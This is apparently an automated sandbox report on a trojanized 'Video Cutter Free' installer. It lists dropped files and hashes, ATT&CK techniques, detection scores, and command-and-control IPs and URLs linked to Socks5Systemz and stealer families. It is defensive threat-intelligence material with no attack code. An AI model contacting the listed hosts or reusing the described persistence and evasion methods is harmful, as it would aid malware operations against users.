                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob, 5_2_60925778
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6090577D sqlite3_bind_parameter_name, 5_2_6090577D
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step, 5_2_6094B764
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6090576B sqlite3_bind_parameter_count, 5_2_6090576B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 5_2_6094A894
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset, 5_2_6095F883
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset, 5_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free, 5_2_6096281E
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset, 5_2_6096583A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset, 5_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset, 5_2_6094A92B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6090EAE5 sqlite3_transfer_bindings, 5_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 5_2_6095FB98
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value, 5_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2
MITRE ATT&CK Matrix (one line per tactic column; a leading number is the count the report attaches to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 2 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 5 Windows Service; 1 Bootkit; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Access Token Manipulation; 5 Windows Service; 12 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection; 1 Bootkit; Dynamic API Resolution
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 35 System Information Discovery; 41 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 3 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Source | Detection | Scanner | Label
imMQqf6YWk.exe | 24% | ReversingLabs | Win32.Trojan.Munp

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | 100% | Joe Sandbox ML
C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe | 100% | Joe Sandbox ML
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | 3% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\LTDIS13n.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\gdiplus.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-19B75.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-2IP8E.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-IBF1C.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-J7MTP.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-JSB39.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-LDIKA.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-PTGV1.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\ltkrn13n.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcp71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcr71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\sqlite3.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.dll (copy) | 0% | ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://188.119.66.185/8 | 0% | Avira URL Cloud | safe
https://188.119.66.185/en-GB | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4 | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b325 | 0% | Avira URL Cloud | safe
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.dr | false | | high
http://www.remobjects.com/psU | imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.dr | false | | high
http://www.remobjects.com/ps | imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.dr | false | | high
https://www.easycutstudio.com/support.html | imMQqf6YWk.exe, 00000000.00000002.3874000805.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011773117.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011705088.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874072222.0000000000832000.00000004.00000020.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2013945725.0000000003230000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874349520.0000000002358000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2014010509.0000000002358000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4 | videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b325 | videocutterfree.exe, 00000005.00000002.3874287343.0000000000C08000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/8 | videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ | videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/en-GB | videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
31.214.157.206 | unknown | Germany | 58329 | RACKPLACEDE | false
188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1572393
                              Start date and time:2024-12-10 14:33:33 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 6s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:9
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:imMQqf6YWk.exe
                              renamed because original name is a hash value
                              Original Sample Name:c9019cfc066b4cf4439ab3fa00ae3ac9.exe
                              Detection:MAL
                              Classification:mal84.troj.evad.winEXE@10/30@0/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 206
                              • Number of non-executed functions: 296
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: imMQqf6YWk.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
31.214.157.206 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
31.214.157.206 | file.exe | malicious | Socks5Systemz
31.214.157.206 | file.exe | malicious | Socks5Systemz
31.214.157.206 | file.exe | malicious | Socks5Systemz
31.214.157.206 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | NLtIe7ZgkL.exe | malicious | Socks5Systemz
                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RACKPLACEDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Amadey, Stealc, Vidar | 31.214.157.124
RACKPLACEDE | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 31.214.157.226
RACKPLACEDE | .gov.ua.html | malicious | Unknown | 31.214.157.49
RACKPLACEDE | .gov.ua.html | malicious | Unknown | 31.214.157.49
FLYNETRU | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9 | malicious | Unknown | 188.119.66.154
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | 17Xmvtq2Tq.exe | malicious | Vidar | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Amadey, Stealc, Vidar | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\DVCMediaPlugin\sqlite3.dll | NLtIe7ZgkL.exe | malicious | Socks5Systemz
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4005103
                                                                            Entropy (8bit):6.385094908393869
                                                                            Encrypted:false
                                                                            SSDEEP:49152:BTUC8iCySyQWcZTGswsorvEmYZv71CCxOPSCgauYWMZsUgT43tG8V:hOW0TGswssgv71CjPSCgaupMZa4T
                                                                            MD5:F00EE01B4436F8DD28084F015B123ECC
                                                                            SHA1:C3C00505968617B33BF22C2955CA882B2B7E0810
                                                                            SHA-256:7F99B4F27FF33CFCA71F5E5B6645D2DD6F3D0D65CD97421F55317501B444D236
                                                                            SHA-512:BB9B5E2726BB34088D05C1AEA76FDA6973D8349E8F963FA5EFE02347F89F33D1AA69469BF5DBAFBFB255F8CE5E5540867E3027B1FEA3B512BD2ABF04E248DDC0
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):645592
                                                                            Entropy (8bit):6.50414583238337
                                                                            Encrypted:false
                                                                            SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                            MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                            SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                            SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                            SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                             • Filename: file.exe, Detection: malicious (8 related analyses)
                                                                             • Filename: NLtIe7ZgkL.exe, Detection: malicious
                                                                            Reputation:high, very likely benign file
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:OpenPGP Public Key
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Din:Di
                                                                            MD5:AA4E8E5E00E73708E143C82E846951CC
                                                                            SHA1:C1259F2BA9302B4EF84CB1A02288D3F00F500CCF
                                                                            SHA-256:7ECD0EF93A09F3481A1FB88BA00F3DBFE96B363B23117701CCF0D5CFB328E9FE
                                                                            SHA-512:F75432680E3E14D036A852AB71B85EFF335A1C37580F48E511D64B6AFBEFBB9CFC922124ED3D67B327A601D8811F4D01C776B642FBF2FB4829F69E9214889F5F
                                                                            Malicious:false
                                                                            Preview:.CXg....
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):0.8112781244591328
                                                                            Encrypted:false
                                                                            SSDEEP:3:M:M
                                                                            MD5:4352D88A78AA39750BF70CD6F27BCAA5
                                                                            SHA1:3C585604E87F855973731FEA83E21FAB9392D2FC
                                                                            SHA-256:67ABDD721024F0FF4E0B3F4C2FC13BC5BAD42D0B7851D456D88D203D15AAA450
                                                                            SHA-512:EDF92E3D4F80FC47D948EA2F17B9BFC742D34E2E785A7A4927F3E261E8BD9D400B648BFF2123B8396D24FB28F5869979E08D58B4B5D156E640344A2C0A54675D
                                                                            Malicious:false
                                                                            Preview:....
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):128
                                                                            Entropy (8bit):2.9012093522336393
                                                                            Encrypted:false
                                                                            SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                            MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                            SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                            SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                            SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                            Malicious:false
                                                                            Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                            Process:C:\Users\user\Desktop\imMQqf6YWk.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):705536
                                                                            Entropy (8bit):6.505789876477672
                                                                            Encrypted:false
                                                                            SSDEEP:12288:UTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuIVwRxyF:IPcYn5c/rPx37/zHBA6pDp2mIEiICRx+
                                                                            MD5:A0EB775B14D55062C7EB9F9226916FE8
                                                                            SHA1:CE7878F2CC9FC561B4140627FE267C556A4E51C0
                                                                            SHA-256:700DD93C1170907C6C5D921089593C4171489F16FA7D006CF9E85BF468707B61
                                                                            SHA-512:F3207B7C4FC1ABFE0D2EDFEE8422220231214029104901CF8C88D198ABF9B31DECAD22D310D59FD512FCD6C3A576484EC6050EBEDDDA8A93A40895C3EF78A2E7
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2560
                                                                            Entropy (8bit):2.8818118453929262
                                                                            Encrypted:false
                                                                            SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                            MD5:A69559718AB506675E907FE49DEB71E9
                                                                            SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                            SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                            SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.289297026665552
                                                                            Encrypted:false
                                                                            SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                            MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                            SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
